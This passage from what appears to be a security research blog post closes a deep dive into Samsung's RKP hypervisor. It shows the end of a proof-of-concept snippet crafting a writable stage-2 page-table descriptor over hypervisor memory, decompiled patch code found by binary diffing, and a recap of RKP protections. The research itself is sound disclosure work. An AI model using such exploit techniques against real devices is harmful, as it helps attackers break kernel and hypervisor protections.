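  uint64_t output_addr = 0x87000000; // 2MB-aligned output address (assumed to be the hypervisor memory).
  uint64_t desc = output_addr
                | (1 << 10)   // AF=1: access flag set.
                | (3 << 6)    // S2AP=0b11: readable and writable at stage 2.
                | (0xf << 2)  // MemAttr=0b1111: normal write-back cacheable memory.
                | (1 << 0);   // bits[1:0]=0b01: block descriptor.
  printf("%#llx\n", (unsigned long long)desc); // Prints 0x870004fd.
  return 0;
}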
We noticed that binaries built after May 27 2020 include a patch for this vulnerability, but we don't know whether it was privately disclosed or found internally. It should have affected all devices with Exynos and Snapdragon chipsets.
Let's take a look at the latest firmware update available for our research device to see what the changes are. First, the check_kernel_input function. Interestingly, instead of simply changing the log level, they duplicated the call to uh_log. It's weird, but at least it does the job.
int64_t check_kernel_input(uint64_t paddr) {
// ...
res = protected_ranges_contains(paddr);
if (res) {
uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
uh_log('D', "pa_restrict.c", 96, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
}
return res;
}
We also noticed while binary diffing that they added some extra checks in rkp_get_pa. They are now enforcing that the physical address be contained in the dynamic_regions memlist. Better safe than sorry!
int64_t rkp_get_pa(uint64_t vaddr) {
// ...
if (!vaddr) {
return 0;
}
if (vaddr < 0xffffffc000000000) {
paddr = virt_to_phys_el1(vaddr);
if (!paddr) {
if ((vaddr & 0x4000000000) != 0) {
paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
} else {
paddr = vaddr - KIMAGE_VOFFSET;
}
}
} else {
paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
}
check_kernel_input(paddr);
if (!memlist_contains_addr(&uh_state.dynamic_regions, paddr)) {
uh_log('L', "rkp_paging.c", 70, "RKP_68592c58 %lx", paddr);
uh_log('D', "rkp_paging.c", 71, "RKP_68592c58 %lx", paddr);
}
return paddr;
}
Let's recap the various protections offered by Samsung RKP: sensitive kernel global variables are moved to the .rodata region (read-only); sensitive data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages because of the modifications made by Samsung to the SLUB allocator; and checks are performed whenever new credentials are assigned, so the cred field of a task_struct cannot simply be made to point to more privileged credentials.
In this deep dive into Samsung RKP's internals, we have seen how a security hypervisor can help against kernel exploitation. Like other defense-in-depth measures, it makes it harder for an attacker who has gained read-write access to fully compromise the kernel. But this great engineering work doesn't prevent making (sometimes simple) mistakes in the implementation.
There are a lot more things about the hypervisor that we did not mention here but that deserve a follow-up blog post: unpatched vulnerabilities that we cannot talk about yet, explaining the differences between Exynos and Snapdragon implementations, digging into the new framework of the S20, etc.